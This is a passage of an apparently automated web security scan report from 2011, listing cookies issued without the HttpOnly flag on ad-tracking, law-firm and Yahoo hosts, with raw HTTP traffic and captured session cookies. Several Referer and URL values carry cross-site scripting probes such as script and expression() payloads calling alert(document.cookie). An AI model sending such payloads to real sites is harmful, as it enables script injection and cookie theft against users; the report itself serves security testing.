Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFCap=1463B1219,174796|0,11,1; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=1099,2,14; FFad=0; aps=1
If-None-Match: "812b9ff1-5d7-4989a5a58d7c0"

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Thu, 19 Jan 2012 15:50:46 GMT;domain=.zedo.com;path=/;
ETag: "812b9ff1-5d7-4989a5a58d7c0"
Vary: Accept-Encoding
X-Varnish: 2233581894 2233581891
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=326057
Expires: Sun, 23 Jan 2011 10:25:03 GMT
Date: Wed, 19 Jan 2011 15:50:46 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var zzl='en-US';


if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

10.21. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=1483&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/ADO/iview/278612752/direct;wi.1;hi.1/01?click=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; aps=1; FFgeo=5386156; FFcat=933,56,15:1099,2,14; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=749B826,20|1483_749#365;expires=Thu, 19 Jan 2012 15:50:47 GMT;domain=.zedo.com;path=/;
ETag: "6c17875e-7054-4942082502f40"
X-Varnish: 1435724280 1435712339
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=10740
Expires: Wed, 19 Jan 2011 18:49:47 GMT
Date: Wed, 19 Jan 2011 15:50:47 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;

10.22. http://ds.addthis.com/red/psi/sites/www.csmonitor.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csmonitor.com/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 179
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 15:51:10 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 15:51:10 GMT; Path=/
Set-Cookie: di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 12:57:24 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 19 Jan 2011 15:51:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 19 Jan 2011 15:51:10 GMT
Connection: close

_ate.ad.hpr({"urls":["http://segment-pixel.invitemedia.com/pixel?pixelID=38582&partnerID=169&key=segment"],"segments" : ["19F"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg=="})

10.23. http://jonesdaydiversity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:23:51 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=6605501; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=prip4smd5pjynyyoaeu1acy0; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9929
Set-Cookie: NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title id="ctl00_htmlTitle">Jones Day Diversity</title>
<link rel="stylesheet"
...[SNIP]...

10.24. http://jonesdaydiversity.com/404.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /404.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /404.aspx HTTP/1.1
Host: jonesdaydiversity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; __utmz=21182496.1295451935.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/21; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; DefaultCulture=en-US; NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660; __utma=21182496.1025166527.1295451935.1295451935.1295451935.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=21182496; __utmb=21182496.2.10.1295451935; ASP.NET_SessionId=frpmkd55p5dmxt55rnepogqw; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; SiteId=0;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Wed, 19 Jan 2011 18:08:48 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=1383; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 403


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

10.25. http://jonesdaydiversity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jonesdaydiversity.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: jonesdaydiversity.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1389; PortletId=6605501; SiteId=1383; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ASP.NET_SessionId=frpmkd55p5dmxt55rnepogqw; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; ZoneId=7; NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660; __utmz=21182496.1295451935.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/21; __utma=21182496.1025166527.1295451935.1295451935.1295451935.1; __utmc=21182496; __utmb=21182496.1.10.1295451935

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:45:17 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000610
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A37
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=0; path=/
Set-Cookie: PortletId=0; path=/
Set-Cookie: SiteId=0; path=/
Set-Cookie: ZoneId=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 463
Content-Length: 463


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<html>
<head><title>
   404
</title></head>
<body MS_POSITIONING="FlowLayout">
   
<form name="Form1" method="post" acti
...[SNIP]...

10.26. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K08784&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=MLvv8iMJPj5n556Bo8jwxg27aVMsKvlZeh88v6LFxvi6NShB6ZO83AmHuP4JgK9bvgpJZgsqUaP2xfTnxNPh9+fmSEPkCVwJX705HIrDAdU6h9yhStmEjquZrguVeF3r0KH2OzLBVWAxUkwC4gAcARichgtw510EVacnhilf+8mRFAtdqKZBM6NUyjil0ZdVPRDqI+Ti+FIe6fewtlE9GinOst7C+rlOGLcLpjRwr3ZfMSayOJgkjwJdHiBSJ9kAcsoTnnNvaA7Xcb0oB88geiObO0gCWiOMGKuhN5NhpXa5wNJrUpjtCGmrVtVPNsrxL9ryWzajTucvw6SIgD8tYcWt49xZgaknzfQMm4nMuUr+qb1f+Ms3ek2Rc8bT/TWEYTevTxXB1YSJNhNpyO+5lLFTcDcxf+duWIK8eU0eIZAncGmWmIMN2HAprOXDL92vjPG5GfbTEfgpUERmJC38xypT/U/eZtb2YBNcle27OeZkVpQY88kycEdRsS0Ks4HLd9MJ6YiDUxLI3FUlyF0iCBOApuRiSn2zDur8XA1O6kZwXMP/vqnO/qlcm8YSMQteDyI8xTLOkrtw5XuzDTiehCDdIT5AUFXEVikG1xbWOf61/rLXUN710OVSlXuiKpp7slVOdtdIlvK5Ef2r/dR4A+dOCYr8QFU/PgPleGbyIL5+FSmkfzlkK9kpSlXIgokpHC3DmN7FSnZ4W681z5mM3+bkQyAQa1deCg6dY3j8xQBsPgkVRyyliBZ/BT5AfFB6Kt2bfoD+HZA9FOS08BLyiny5VyDBbEms9liC5Fs3TFj1lR+RyszTbus6ezqbVXF77t83kYCDwMJ+4srH8tO8ZoaqbVgfKSopwI144BcK1RceyhLfvKeO2mls6933wcTzEXOpWYxsjrgl5Q==; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMd5U+DfxIU7WwyrNQb2zsSFn/hJiW258mwCPCWmcgin7Ykjm72mb7cpStB8YF3kI7TO6x7AobBweYSl9GZ0nXyMV0lFSlMa1jHrq+n9QT6FijETfViMfJgDyuBz0n8Hk28yO5p/fRuPzGtQPRkyu5Bc6axhObjT2cysIx+D4/NrHkSZpo4vk8w5l61U5SqdOiUvEeCZ5WrSLwN+Xq5aEPZSO2oX3vsODweKrIMy8p+ldR7d76u4sEt6RgWsfSNxtXQ1lt23lO4GrGh25UY7nMoVnrr5iAvFRtg24ViPVDowzcxt8eRODdcZiwbVc2np3WjZtoAJ1aO71nPtckWRa8VCRDcVPa+cMxvGtmbDEBHIOMyi8IUEWK0av0+4ojr1uh/umPt1bAaq4aUO4z8oENY7vBTaZSyETfDH8dVtshVbMqgt6mXZyMdxxn2bQSZVCIbYsSr7E1B995sZq2f+pJ2+M8K7OUr/r3a9SLKcxQ+lAR8cX83159adv1KgRuaALpGKRFQDil4cYbegCYXB33l6nFeV9R2FwBG2izy3Gm5I+NoOBfFFGboa7p0gM1gg8TrrRL1LoRP21v8OErLvjC/xINg6T9J1c15UckQKoakfMW6lVoLFukvaGPQXMQt3IlOXJncY9VGQY3BI0ThPnKoHx//VhhBBOENVxJVlKoRta67M24YVtuqylurRv9JKzlEWoYz0la7gmQzl6pSfsGHo6jvv6og5GuUjBC/UfRyPmP2YD/Z6MLNJ5s1pn32pCXBNuGqM/MWn0ix3FgHGlWpSEpv7Ru3AkJmVgjGyeuRwLBzeHzpYe8hv8Y=; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NVPpKSpj3p3uht7FyYbjN10zcmhKlYGgrukmLuVU97bs7miUcEYhUoOEQoW6hq+QzluB96P8Tutq8Gx/9mt2RRtWTTDFMPnlXOlgYExrUWbzd6XsS3YDB9n8sEO7rJWMBAqM62rPEc1V/be727XdvCMrTAr9wCWxHSaoTomecJyXQpHihffMuEVRzw8h3OxDNuVJgjD7Ih9Ly8ngvXt2rt4SmNQxGHu6UbQFB9GchtzgDx3nIlBpeezAjFRoVM/vHBxUmvtH+1bbl1Fl4ZdnrmM5b1W59yZWpmuOnSSf2k8PLj3aIydPWaqBjSCH4kLnkkd3V9G4pc1/iB+wt5HJPWxDEtpBQKliPLyOJqSHo3GZg11SnpmwXl2EB62oOwnJfXRIG68qmghWJ1ubkNZO3R4IUrINcOdCEzftiZjz6BFLEjMtt/bWMBlAXwgUgztsoo2ReD/q2/z4a41kA0Ypr8hKYa5H4msA1vfs8KMUJI39rh63+qDIG2f7MA7byhF9bF8U8P3xPeIB9DYWg6UQ/TE2BPMUNqktnd2vc2dilAmnnt9dcZ38/Q0Cyzd7bFlqzPGdqxg5MzrB4+r6J8c5Q0sZ/FB9HiflUF+cbGnLI6nnK2Uc9cyirS/6Md3KUSQ9eMlES7QuYhvG9NQMPPFPEgeFZVaJzY2Z3FyVapNr93Ni+GtlNI57fSPs+pJWw/lFgUYqf4s9/eIB9m3CKZDLWKxdGYeWDmGFQAfUIDoKUvXwnyf9wrwJoT/ZmJjMt9jNm1+QrjX0vap9RkKG/ygD/eKI9TYoaK5Y/J79Ulj12hC7mVVyE3wjhR0e9GaRiyqRhbuEG3Z2Ib5J8zbDEd4LC6/1dthK3LavDLQy0A5z3p/krZoaCL1QKiV9JDBOBn4j8npeNRYQzTnQhiiv9rOapvQUNE/nUhaxuRqyT9YwXp0DiJuezLHxHOAtqsBAvJ7lll2Zm7ClWHDEew07dWhx+WXkK3XEm1YAxR/7f9yvpGkXfWY1x6RuGiP7tA==; Domain=.revsci.net; Expires=Thu, 19-Jan-2012 17:54:40 GMT; Path=/
Last-Modified: Wed, 19 Jan 2011 17:54:40 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 20 Jan 2011 17:54:40 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 19 Jan 2011 17:54:39 GMT
Content-Length: 5867

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

10.27. http://landesm.gfi.com/event-log-analysis-sm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:09:09 GMT
Etag: "6e2f3ed9101a167ccc2f760d7ec44f1e01b39cc9"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 18 Jul 2011 18:09:09 GMT; Path=/
Content-Length: 30166
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...

10.28. https://login.yahoo.com/config/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:09:20 GMT
Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 41558


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...

10.29. http://lt.navegg.com/g.lt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lt.navegg.com
Path:   /g.lt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /g.lt?nvst=12596&nvtt=z&nvup=1 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: ltcid=547362597; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2013 11:57:37 GMT
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2011 15:57:37 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 17:57:37 GMT
Server: lighttpd/1.4.19
Content-Length: 43

tuple=" ";
ltload();
ltsetid("547362597");

10.30. http://skaddenpractices.skadden.com/fca/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /fca/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fca/ HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:41 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460881320393; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDEN=cc63b5af0e1427cc675792a20a3de3ad; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 25881


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - False Claims Act Defense</title>

<link href="scripts/skadden_mini.css" rel="stylesheet
...[SNIP]...

10.31. http://skaddenpractices.skadden.com/hc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /hc/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/ HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882188919; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENHC=425a8e846d59a1f623a263c78af74ead; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 39882


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - Health Care</title>

<link href="scripts/skadden_mini.css" rel="stylesheet" type="text/
...[SNIP]...

10.32. http://skaddenpractices.skadden.com/sec/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sec/ HTTP/1.1
Host: skaddenpractices.skadden.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:14:42 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
Set-Cookie: Apache=173.193.214.243.1295460882189369; path=/
X-Powered-By: PHP/5.2.5
Set-Cookie: FRONTSKADDENSEC=34e7c36f9cb5adceaddd1d87a9ec2e3c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21472


<!-- DW6 -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>Skadden - SEC Enforcement and Compliance</title>

<link href="scripts/skadden_mini.css" rel="styl
...[SNIP]...

10.33. http://skaddenpractices.skadden.com/sec/scripts/resize.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skaddenpractices.skadden.com
Path:   /sec/scripts/resize.gif

Issue detail

